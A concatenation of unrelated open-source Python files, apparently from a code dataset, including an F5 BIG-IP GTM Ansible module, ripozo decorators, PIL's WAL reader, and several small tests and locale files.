if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
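        # Diff every updatable parameter; dict results are merged into the
        # change set so that linked parameters (e.g. server_type and devices)
        # can change together.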
diff = Difference(self.want, self.have)
diff.client = self.client
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state in ['present', 'enabled', 'disabled']:
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _check_link_discovery_requirements(self):
if self.want.link_discovery in ['enabled', 'enabled-no-delete'] and self.want.virtual_server_discovery == 'disabled':
raise F5ModuleError(
"Virtual server discovery must be enabled if link discovery is enabled"
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def create(self):
if self.want.state == 'disabled':
self.want.update({'disabled': True})
elif self.want.state in ['present', 'enabled']:
self.want.update({'enabled': True})
self.adjust_server_type_by_version()
self.should_update()
if self.want.devices is None:
raise F5ModuleError(
"You must provide an initial device."
)
self._assign_creation_defaults()
self.handle_prober_settings()
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
if self.exists():
return True
else:
raise F5ModuleError("Failed to create the server")
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/gtm/server/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return response['selfLink']
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
changed = False
if self.exists():
changed = self.remove()
return changed
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the server")
return True
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
response = self.client.api.delete(uri)
if response.status == 200:
return True
raise F5ModuleError(response.content)
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/gtm/server/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
        if resp.status == 404 or ('code' in response and response['code'] == 404):
return False
return True
class V1Manager(BaseManager):
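    """Handles GTM servers on BIG-IP (TMOS) versions earlier than 13.0.0."""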
def _assign_creation_defaults(self):
if self.want.server_type is None:
if len(self.want.devices) == 0:
raise F5ModuleError(
"You must provide at least one device."
)
elif len(self.want.devices) == 1:
self.want.update({'server_type': 'single-bigip'})
else:
self.want.update({'server_type': 'redundant-bigip'})
if self.want.link_discovery is None:
self.want.update({'link_discovery': 'disabled'})
if self.want.virtual_server_discovery is None:
self.want.update({'virtual_server_discovery': 'disabled'})
self._check_link_discovery_requirements()
def adjust_server_type_by_version(self):
if len(self.want.devices) == 1 and self.want.server_type == 'bigip':
self.want.update({'server_type': 'single-bigip'})
if len(self.want.devices) > 1 and self.want.server_type == 'bigip':
self.want.update({'server_type': 'redundant-bigip'})
def update(self):
self.have = self.read_current_from_device()
self.handle_prober_settings()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def handle_prober_settings(self):
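        # Prober preference/fallback are not handled on this legacy (pre-13.0)
        # code path, so any supplied values are dropped here rather than sent
        # to the device.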
if self.want.prober_preference is not None:
self.want._values.pop('prober_preference')
if self.want.prober_fallback is not None:
self.want._values.pop('prober_fallback')
class V2Manager(BaseManager):
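    """Handles GTM servers on BIG-IP (TMOS) 13.0.0 and later."""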
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def _assign_creation_defaults(self):
if self.want.server_type is None:
self.want.update({'server_type': 'bigip'})
if self.want.link_discovery is None:
self.want.update({'link_discovery': 'disabled'})
if self.want.virtual_server_discovery is None:
self.want.update({'virtual_server_discovery': 'disabled'})
self._check_link_discovery_requirements()
def adjust_server_type_by_version(self):
pass
def handle_prober_settings(self):
if self.want.prober_preference == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_preference is set to 'pool'"
)
if self.want.prober_preference is not None and self.want.prober_fallback is not None:
if self.want.prober_preference == self.want.prober_fallback:
raise F5ModuleError(
"The parameters for prober_preference and prober_fallback must not be the same."
)
if self.want.prober_fallback == 'pool' and self.want.prober_pool is None:
raise F5ModuleError(
"A prober_pool needs to be set if prober_fallback is set to 'pool'"
)
class ArgumentSpec(object):
def __init__(self):
self.states = ['absent', 'present', 'enabled', 'disabled']
self.server_types = [
'alteon-ace-director',
'cisco-css',
'cisco-server-load-balancer',
'generic-host',
'radware-wsd',
'windows-nt-4.0',
'bigip',
'cisco-local-director-v2',
'extreme',
'generic-load-balancer',
'sun-solaris',
'cacheflow',
'cisco-local-director-v3',
'foundry-server-iron',
'netapp',
'windows-2000-server'
]
self.supports_check_mode = True
argument_spec = dict(
state=dict(
default='present',
choices=self.states,
),
name=dict(required=True),
server_type=dict(
choices=self.server_types,
aliases=['product']
),
datacenter=dict(),
link_discovery=dict(
choices=['enabled', 'disabled', 'enabled-no-delete']
),
virtual_server_discovery=dict(
choices=['enabled', 'disabled', 'enabled-no-delete']
),
devices=dict(
type='list'
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
iquery_options=dict(
type='dict',
options=dict(
allow_path=dict(type='bool'),
allow_service_check=dict(type='bool'),
allow_snmp=dict(type='bool')
)
),
availability_requirements=dict(
type='dict',
options=dict(
type=dict(
choices=['all', 'at_least', 'require'],
required=True
),
at_least=dict(type='int'),
number_of_probes=dict(type='int'),
number_of_probers=dict(type='int')
),
mutually_exclusive=[
['at_least', 'number_of_probes'],
['at_least', 'number_of_probers'],
],
required_if=[
['type', 'at_least', ['at_least']],
['type', 'require', ['number_of_probes', 'number_of_probers']]
]
),
limits=dict(
type='dict',
options=dict(
bits_enabled=dict(type='bool'),
packets_enabled=dict(type='bool'),
connections_enabled=dict(type='bool'),
cpu_enabled=dict(type='bool'),
memory_enabled=dict(type='bool'),
bits_limit=dict(type='int'),
packets_limit=dict(type='int'),
connections_limit=dict(type='int'),
cpu_limit=dict(type='int'),
memory_limit=dict(type='int'),
)
),
monitors=dict(type='list'),
prober_preference=dict(
choices=['inside-datacenter', 'outside-datacenter', 'inherit', 'pool']
),
prober_fallback=dict(
choices=['inside-datacenter', 'outside-datacenter',
'inherit', 'pool', 'any', 'none']
),
prober_pool=dict()
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
theofilis/tutorial-rabbitMQ | refs/heads/master | code/lesson3/receive_logs.py | 1 | #!/usr/bin/env python
__author__ = 'theofilis'
import pika
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='logs',
type='fanout')
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue
channel.queue_bind(exchange='logs',
queue=queue_name)
print ' [*] Waiting for logs. To exit press CTRL+C'
def callback(ch, method, properties, body):
print " [x] %r" % (body,)
channel.basic_consume(callback,
queue=queue_name,
no_ack=True)
channel.start_consuming() |
gustavla/self-supervision | refs/heads/master | selfsup/multi/methods/__init__.py | 1 | from __future__ import division, print_function, absolute_import
from .rot90 import Rot90
from .colorize_hypercolumn import ColorizeHypercolumn
from .colorize_hypercolumn2 import ColorizeHypercolumn2
from .colorize_hypercolumn3 import ColorizeHypercolumn3
from .video_saliency import VideoSaliency
from .video_saliency_hypercolumn import VideoSaliencyHypercolumn
from .video_relative_flow import VideoRelativeFlow
from .jigsaw import Jigsaw
from .autoencoder import Autoencoder
from .supervised import Supervised
|
tovrstra/horton | refs/heads/master | horton/test/test_log.py | 4 | # -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2017 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
def test_recursive_timer():
@timer.with_section('Foo')
def factorial(n):
if n <= 1:
return 1
else:
return factorial(n-1)*n
assert factorial(4) == 24
|
mmmaaaxxx77/Python-Django-AdminLTE2 | refs/heads/master | HypermediaDemo/apps/ripozo/CustomDecorators.py | 1 | """
Contains the critical decorators for ripozo.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from functools import wraps, update_wrapper
import logging
import warnings
import six
_logger = logging.getLogger(__name__)
class ClassPropertyDescriptor(object):
"""
Straight up stolen from stack overflow
Implements class level properties
http://stackoverflow.com/questions/5189699/how-can-i-make-a-class-property-in-python
"""
def __init__(self, fget, fset=None):
self.fget = fget
self.fset = fset
def __get__(self, obj, klass=None):
if klass is None:
klass = type(obj)
return self.fget.__get__(obj, klass)()
def classproperty(func):
"""
Using this decorator a class can have a property.
    Necessary for dynamically setting urls
on the application. Works exactly the same
as a normal property except the class can be the
argument instead of self.
.. code-block:: python
class MyClass(object):
@classproperty
def my_prop(cls):
return cls.__name__
>>> MyClass.my_prop
'MyClass'
:param func: The function to wrap
:type func: function
:rtype: ClassPropertyDescriptor
"""
if not isinstance(func, (classmethod, staticmethod)):
func = classmethod(func)
return ClassPropertyDescriptor(func)
class _apiclassmethod(object):
"""
A special version of classmethod that allows
the user to decorate classmethods and vice versa.
There is some hacky shit going on in here. However,
it allows an arbitrary number of @apimethod decorators
and @translate decorators which is key.
"""
__name__ = str('_apiclassmethod')
def __init__(self, func):
"""
Initializes the class method.
:param types.FunctionType func: The function to decorate.
"""
update_wrapper(self, func)
for key, value in six.iteritems(getattr(func, 'func_dict', {})):
self.__dict__[key] = value
self.func = func
if hasattr(func, 'func_name'):
self.func_name = func.func_name
def __get__(self, obj, klass=None):
"""
A getter that automatically injects the
class as the first argument.
"""
if klass is None:
klass = type(obj)
@wraps(self.func)
def newfunc(*args):
"""
            Determines whether a class was already passed as the
            first argument; if not, injects the bound class so the
            wrapped function always receives the class first.
"""
if len(args) == 0 or not isinstance(args[0], type):
return self.func(klass, *args)
return self.func(*args)
return newfunc
def __call__(self, cls, *args, **kwargs):
"""
This is where the magic happens.
"""
return self.__get__(None, klass=cls)(*args, **kwargs)
class apimethod(object):
"""
Decorator for declaring routes on a ripozo resource.
Any method in a ResourceBase subclass that is decorated
with this decorator will be exposed as an endpoint in
the greater application. Although an apimethod can be
decorated with another apimethod, this is not recommended.
Any method decorated with apimethod should return a ResourceBase
instance (or a subclass of it).
"""
def __init__(self, route='', endpoint=None, methods=None, no_pks=False, **options):
"""
Initialize the decorator. These are the options for the endpoint
        that you are constructing. It determines what URLs will be
handled by the decorated method.
.. code-block:: python
class MyResource(ResourceBase):
                @apimethod(route='/myroute', methods=['POST', 'PUT'])
def my_method(cls, request):
# ... Do something to handle the request and generate
# the MyResource instance.
:param str|unicode route: The route for endpoint. This will
be appended to the base_url for the ResourceBase subclass
when constructing the actual route.
:param str|unicode endpoint: The name of the endpoint. Defaults
to the function name.
:param list[str|unicode] methods: A list of the accepted http methods
for this endpoint. Defaults to ['GET']
:param bool no_pks: If this flag is set to True the ResourceBase
subclass's base_url_sans_pks property will be used instead
of the base_url. This is necessary for List endpoints where
the pks are not part of the url.
        :param dict options: Additional arguments to pass to the dispatcher
that is registering the route with the application. This is
dependent on the individual dispatcher and web framework that
you are using.
"""
_logger.info('Initializing apimethod route: %s with options %s', route, options)
self.route = route
if not methods:
methods = ['GET']
self.options = options
self.options['methods'] = methods
self.options['no_pks'] = no_pks
self.endpoint = endpoint
def __call__(self, func):
"""
        The actual decorator that is applied to the method and returns
        it registered as a ripozo route.
        In addition to setting some properties on the function itself
        (i.e. ``__rest_route__`` and ``routes``), it also wraps the actual
        function, calling both the preprocessors and postprocessors.
        Preprocessors receive at least the cls, the function name, and the request as arguments.
        Postprocessors receive at least the cls, the function name, the request, and the resource as arguments.
        :param classmethod func: The method to register and wrap.
:return: The wrapped classmethod that is an action
that can be performed on the resource. For example,
any sort of CRUD action.
:rtype: classmethod
"""
setattr(func, '__rest_route__', True)
routes = getattr(func, 'routes', [])
routes.append((self.route, self.endpoint, self.options))
setattr(func, 'routes', routes)
@_apiclassmethod
@wraps(func)
def wrapped(cls, request, *args, **kwargs):
"""
            Runs the pre/postprocessors around the wrapped apimethod.
"""
for proc in cls.preprocessors:
proc(cls, func.__name__, request, *args, **kwargs)
resource = func(cls, request, *args, **kwargs)
for proc in cls.postprocessors:
proc(cls, func.__name__, request, resource, *args, **kwargs)
return resource
return wrapped
class translate(object):
"""
Decorator for validating the inputs to an apimethod
and describing what is allowed for that apimethod to
an adapter if necessary.
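    A minimal usage sketch (``SomeField`` is illustrative; any FieldBase
    subclass works):
    .. code-block:: python
        class MyResource(ResourceBase):
            @apimethod(methods=['POST'])
            @translate(fields=[SomeField('name')], validate=True)
            def create(cls, request):
                # ... use the translated/validated request to build and
                # return a MyResource instance.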
"""
def __init__(self, fields=None, skip_required=False,
validate=False, manager_field_validators=False):
"""
Initializes the decorator with the necessary fields.
the fields should be instances of FieldBase and should
give descriptions of the parameter and how to input them
(i.e. query or body parameter)
:param list fields: A list of FieldBase instances (or subclasses
of FieldBase).
:param bool skip_required: If this flag is set to True,
then required fields will be considered optional. This
is useful for an update when using the manager_field_validators
as this allows the user to skip over required fields like
the primary keys which should not be required in the updated
arguments.
:param bool validate: Indicates whether the validations should
be run. If it is False, it will only translate the fields.
:param bool manager_field_validators: (Deprecated: will be removed
in v2) A flag indicating that the fields from the Resource's
manager should be used.
"""
self.original_fields = fields or []
self.skip_required = skip_required
self.validate = validate
self.manager_field_validators = manager_field_validators
if manager_field_validators:
warnings.warn('The manager_field_validators attribute will be'
' removed in version 2.0.0. Please use the '
'"ripozo.decorators.manager_translate decorator"',
PendingDeprecationWarning)
self.cls = None
def __call__(self, func):
"""
Wraps the function with translation and validation.
This allows the inputs to be cast and validated as necessary.
Additionally, it provides the adapter with information about
what is necessary to successfully make a request to the wrapped
apimethod.
        :param method func: The apimethod function to wrap.
:return: The wrapped function
:rtype: function
"""
@_apiclassmethod
@wraps(func)
def action(cls, request, *args, **kwargs):
"""
Gets and translates/validates the fields.
"""
# TODO This is so terrible. I really need to fix this.
from ripozo.resources.fields.base import translate_fields
translate_fields(request, self.fields(cls.manager),
skip_required=self.skip_required, validate=self.validate)
return func(cls, request, *args, **kwargs)
action.__manager_field_validators__ = self.manager_field_validators
action.fields = self.fields
return action
def fields(self, manager):
"""
Gets the fields from the manager if necessary.
"""
if self.manager_field_validators:
return self.original_fields + manager.field_validators
return self.original_fields
class manager_translate(object):
"""
A special case translation and validation for using managers.
Performs the same actions as ripozo.decorators.translate
but it inspects the manager to get the resources necessary.
Additionally, you can tell it what fields to get from the manager
via the fields_attr. This will look up the fields on the manager
to return.
"""
def __init__(self, fields=None, skip_required=False,
validate=False, fields_attr='fields'):
"""A special case translation that inspects the manager
to get the relevant fields. This is purely for ease of use
and may not be maintained
:param list[ripozo.resources.fields.base.BaseField] fields: A
list of fields to translate
:param bool skip_required: If true, it will not require
any of the fields. Only relevant when validate is True
:param bool validate: A flag that indicates whether validation
should occur.
:param str|unicode fields_attr: The name of the attribute
to access on the manager to get the fields that are necessary.
e.g. `'create_fields'`, `'list_fields'` or whatever you want.
The attribute should be a list of strings
"""
self.original_fields = fields or []
self.skip_required = skip_required
self.validate = validate
self.fields_attr = fields_attr
self.cls = None
def __call__(self, func):
"""
Wraps the function with translation and validation.
This allows the inputs to be cast and validated as necessary.
Additionally, it provides the adapter with information about
what is necessary to successfully make a request to the wrapped
apimethod.
        :param method func: The apimethod function to wrap.
:return: The wrapped function
:rtype: function
"""
@_apiclassmethod
@wraps(func)
def action(cls, request, *args, **kwargs):
"""
Gets and translates/validates the fields.
"""
# TODO This is so terrible. I really need to fix this.
from ripozo.resources.fields.base import translate_fields
translate_fields(request, self.fields(cls.manager),
skip_required=self.skip_required, validate=self.validate)
return func(cls, request, *args, **kwargs)
action.__manager_field_validators__ = True
action.fields = self.fields
return action
def fields(self, manager):
"""
Gets the fields from the manager
:param ripozo.manager_base.BaseManager manager:
"""
manager_fields = []
for field in manager.field_validators:
if field.name in getattr(manager, self.fields_attr):
manager_fields.append(field)
return self.original_fields + manager_fields
|
knightingal/git_fav | refs/heads/master | git_proxy/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
smi96/django-blog_website | refs/heads/master | lib/python2.7/site-packages/PIL/WalImageFile.py | 19 | # encoding: utf-8
#
# The Python Imaging Library.
# $Id$
#
# WAL file handling
#
# History:
# 2003-04-23 fl created
#
# Copyright (c) 2003 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
# NOTE: This format cannot be automatically recognized, so the reader
# is not registered for use with Image.open(). To open a WAL file, use
# the WalImageFile.open() function instead.
# This reader is based on the specification available from:
# http://www.flipcode.com/archives/Quake_2_BSP_File_Format.shtml
# and has been tested with a few sample files found using google.
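# A short usage sketch (the "sample.wal" path is illustrative):
#
#   from PIL import WalImageFile
#   im = WalImageFile.open("sample.wal")
#   im.save("sample.png")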
from __future__ import print_function
from PIL import Image, _binary
try:
import builtins
except ImportError:
import __builtin__
builtins = __builtin__
i32 = _binary.i32le
##
# Load texture from a Quake2 WAL texture file.
# <p>
# By default, a Quake2 standard palette is attached to the texture.
# To override the palette, use the <b>putpalette</b> method.
#
# @param filename WAL file name, or an opened file handle.
# @return An image instance.
def open(filename):
# FIXME: modify to return a WalImageFile instance instead of
# plain Image object ?
if hasattr(filename, "read"):
fp = filename
else:
fp = builtins.open(filename, "rb")
# read header fields
header = fp.read(32+24+32+12)
size = i32(header, 32), i32(header, 36)
offset = i32(header, 40)
# load pixel data
fp.seek(offset)
im = Image.frombytes("P", size, fp.read(size[0] * size[1]))
im.putpalette(quake2palette)
im.format = "WAL"
im.format_description = "Quake2 Texture"
# strings are null-terminated
im.info["name"] = header[:32].split(b"\0", 1)[0]
next_name = header[56:56+32].split(b"\0", 1)[0]
if next_name:
im.info["next_name"] = next_name
return im
quake2palette = (
# default palette taken from piffo 0.93 by Hans Häggström
b"\x01\x01\x01\x0b\x0b\x0b\x12\x12\x12\x17\x17\x17\x1b\x1b\x1b\x1e"
b"\x1e\x1e\x22\x22\x22\x26\x26\x26\x29\x29\x29\x2c\x2c\x2c\x2f\x2f"
b"\x2f\x32\x32\x32\x35\x35\x35\x37\x37\x37\x3a\x3a\x3a\x3c\x3c\x3c"
b"\x24\x1e\x13\x22\x1c\x12\x20\x1b\x12\x1f\x1a\x10\x1d\x19\x10\x1b"
b"\x17\x0f\x1a\x16\x0f\x18\x14\x0d\x17\x13\x0d\x16\x12\x0d\x14\x10"
b"\x0b\x13\x0f\x0b\x10\x0d\x0a\x0f\x0b\x0a\x0d\x0b\x07\x0b\x0a\x07"
b"\x23\x23\x26\x22\x22\x25\x22\x20\x23\x21\x1f\x22\x20\x1e\x20\x1f"
b"\x1d\x1e\x1d\x1b\x1c\x1b\x1a\x1a\x1a\x19\x19\x18\x17\x17\x17\x16"
b"\x16\x14\x14\x14\x13\x13\x13\x10\x10\x10\x0f\x0f\x0f\x0d\x0d\x0d"
b"\x2d\x28\x20\x29\x24\x1c\x27\x22\x1a\x25\x1f\x17\x38\x2e\x1e\x31"
b"\x29\x1a\x2c\x25\x17\x26\x20\x14\x3c\x30\x14\x37\x2c\x13\x33\x28"
b"\x12\x2d\x24\x10\x28\x1f\x0f\x22\x1a\x0b\x1b\x14\x0a\x13\x0f\x07"
b"\x31\x1a\x16\x30\x17\x13\x2e\x16\x10\x2c\x14\x0d\x2a\x12\x0b\x27"
b"\x0f\x0a\x25\x0f\x07\x21\x0d\x01\x1e\x0b\x01\x1c\x0b\x01\x1a\x0b"
b"\x01\x18\x0a\x01\x16\x0a\x01\x13\x0a\x01\x10\x07\x01\x0d\x07\x01"
b"\x29\x23\x1e\x27\x21\x1c\x26\x20\x1b\x25\x1f\x1a\x23\x1d\x19\x21"
b"\x1c\x18\x20\x1b\x17\x1e\x19\x16\x1c\x18\x14\x1b\x17\x13\x19\x14"
b"\x10\x17\x13\x0f\x14\x10\x0d\x12\x0f\x0b\x0f\x0b\x0a\x0b\x0a\x07"
b"\x26\x1a\x0f\x23\x19\x0f\x20\x17\x0f\x1c\x16\x0f\x19\x13\x0d\x14"
b"\x10\x0b\x10\x0d\x0a\x0b\x0a\x07\x33\x22\x1f\x35\x29\x26\x37\x2f"
b"\x2d\x39\x35\x34\x37\x39\x3a\x33\x37\x39\x30\x34\x36\x2b\x31\x34"
b"\x27\x2e\x31\x22\x2b\x2f\x1d\x28\x2c\x17\x25\x2a\x0f\x20\x26\x0d"
b"\x1e\x25\x0b\x1c\x22\x0a\x1b\x20\x07\x19\x1e\x07\x17\x1b\x07\x14"
b"\x18\x01\x12\x16\x01\x0f\x12\x01\x0b\x0d\x01\x07\x0a\x01\x01\x01"
b"\x2c\x21\x21\x2a\x1f\x1f\x29\x1d\x1d\x27\x1c\x1c\x26\x1a\x1a\x24"
b"\x18\x18\x22\x17\x17\x21\x16\x16\x1e\x13\x13\x1b\x12\x12\x18\x10"
b"\x10\x16\x0d\x0d\x12\x0b\x0b\x0d\x0a\x0a\x0a\x07\x07\x01\x01\x01"
b"\x2e\x30\x29\x2d\x2e\x27\x2b\x2c\x26\x2a\x2a\x24\x28\x29\x23\x27"
b"\x27\x21\x26\x26\x1f\x24\x24\x1d\x22\x22\x1c\x1f\x1f\x1a\x1c\x1c"
b"\x18\x19\x19\x16\x17\x17\x13\x13\x13\x10\x0f\x0f\x0d\x0b\x0b\x0a"
b"\x30\x1e\x1b\x2d\x1c\x19\x2c\x1a\x17\x2a\x19\x14\x28\x17\x13\x26"
b"\x16\x10\x24\x13\x0f\x21\x12\x0d\x1f\x10\x0b\x1c\x0f\x0a\x19\x0d"
b"\x0a\x16\x0b\x07\x12\x0a\x07\x0f\x07\x01\x0a\x01\x01\x01\x01\x01"
b"\x28\x29\x38\x26\x27\x36\x25\x26\x34\x24\x24\x31\x22\x22\x2f\x20"
b"\x21\x2d\x1e\x1f\x2a\x1d\x1d\x27\x1b\x1b\x25\x19\x19\x21\x17\x17"
b"\x1e\x14\x14\x1b\x13\x12\x17\x10\x0f\x13\x0d\x0b\x0f\x0a\x07\x07"
b"\x2f\x32\x29\x2d\x30\x26\x2b\x2e\x24\x29\x2c\x21\x27\x2a\x1e\x25"
b"\x28\x1c\x23\x26\x1a\x21\x25\x18\x1e\x22\x14\x1b\x1f\x10\x19\x1c"
b"\x0d\x17\x1a\x0a\x13\x17\x07\x10\x13\x01\x0d\x0f\x01\x0a\x0b\x01"
b"\x01\x3f\x01\x13\x3c\x0b\x1b\x39\x10\x20\x35\x14\x23\x31\x17\x23"
b"\x2d\x18\x23\x29\x18\x3f\x3f\x3f\x3f\x3f\x39\x3f\x3f\x31\x3f\x3f"
b"\x2a\x3f\x3f\x20\x3f\x3f\x14\x3f\x3c\x12\x3f\x39\x0f\x3f\x35\x0b"
b"\x3f\x32\x07\x3f\x2d\x01\x3d\x2a\x01\x3b\x26\x01\x39\x21\x01\x37"
b"\x1d\x01\x34\x1a\x01\x32\x16\x01\x2f\x12\x01\x2d\x0f\x01\x2a\x0b"
b"\x01\x27\x07\x01\x23\x01\x01\x1d\x01\x01\x17\x01\x01\x10\x01\x01"
b"\x3d\x01\x01\x19\x19\x3f\x3f\x01\x01\x01\x01\x3f\x16\x16\x13\x10"
b"\x10\x0f\x0d\x0d\x0b\x3c\x2e\x2a\x36\x27\x20\x30\x21\x18\x29\x1b"
b"\x10\x3c\x39\x37\x37\x32\x2f\x31\x2c\x28\x2b\x26\x21\x30\x22\x20"
)
|
funson/rt-xen | refs/heads/master | tools/xm-test/tests/destroy/06_destroy_dom0_neg.py | 42 | #!/usr/bin/python
# Copyright (C) International Business Machines Corp., 2005
# Author: Li Ge <[email protected]>
import re
from XmTestLib import *
status, output = traceCommand("xm destroy 0")
if status == 0:
FAIL("xm destroy returned bad status, expected non 0, status is: %i" % status)
elif not re.search("Error", output, re.I):
FAIL("xm destroy returned bad output, expected Error:, output is: %s" % output)
|
Open-Plus/opgui | refs/heads/master | tests/events.py | 80 | import time
import tests
recorded_events = [ ]
def event(self, name, args, kwargs):
global recorded_events
print "*EVENT*", time.time(), self, name, args, kwargs
recorded_events.append((time.time(), self, name, args, kwargs))
def eventfnc(f):
name = f.__name__
def wrapper(self, *args, **kwargs):
event(self, name, args, kwargs)
return f(self, *args, **kwargs)
return wrapper
def get_events():
global recorded_events
r = recorded_events
recorded_events = [ ]
return r
def start_log():
global base_time
base_time = time.time()
def end_log(test_name):
global base_time
results = ""
for (t, self, method, args, kwargs) in get_events():
results += "%s T+%f: %s::%s(%s, *%s, *%s)\n" % (time.ctime(t), t - base_time, str(self.__class__), method, self, args, kwargs)
expected = None
try:
f = open(test_name + ".results", "rb")
expected = f.read()
f.close()
except:
print "NO TEST RESULT FOUND, creating new"
f = open(test_name + ".new_results", "wb")
f.write(results)
f.close()
print results
if expected is not None:
print "expected:"
if expected != results:
f = open(test_name + ".bogus_results", "wb")
f.write(results)
f.close()
raise tests.TestError("test data does not match")
else:
print "test compared ok"
else:
print "no test data to compare with."
def log(fnc, base_time = 0, test_name = "test", *args, **kwargs):
import fake_time
fake_time.setTime(base_time)
start_log()
try:
fnc(*args, **kwargs)
event(None, "test_completed", [], {"test_name": test_name})
except tests.TestError,c:
event(None, "test_failed", [], {"test_name": test_name, "reason": str(c)})
end_log(test_name)
|
lmregus/Portfolio | refs/heads/master | python/design_patterns/env/lib/python3.7/site-packages/docutils/languages/fr.py | 52 | # $Id: fr.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: Stefane Fermigier <[email protected]>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
French-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
'author': 'Auteur',
'authors': 'Auteurs',
'organization': 'Organisation',
'address': 'Adresse',
'contact': 'Contact',
'version': 'Version',
'revision': 'R\u00e9vision',
'status': 'Statut',
'date': 'Date',
'copyright': 'Copyright',
'dedication': 'D\u00e9dicace',
'abstract': 'R\u00e9sum\u00e9',
'attention': 'Attention!',
'caution': 'Avertissement!',
'danger': '!DANGER!',
'error': 'Erreur',
'hint': 'Indication',
'important': 'Important',
'note': 'Note',
'tip': 'Astuce',
'warning': 'Avis',
'contents': 'Sommaire'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
'auteur': 'author',
'auteurs': 'authors',
'organisation': 'organization',
'adresse': 'address',
'contact': 'contact',
'version': 'version',
'r\u00e9vision': 'revision',
'statut': 'status',
'date': 'date',
'copyright': 'copyright',
'd\u00e9dicace': 'dedication',
'r\u00e9sum\u00e9': 'abstract'}
"""French (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
|
juanalfonsopr/odoo | refs/heads/8.0 | addons/hr_timesheet_sheet/report/__init__.py | 342 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
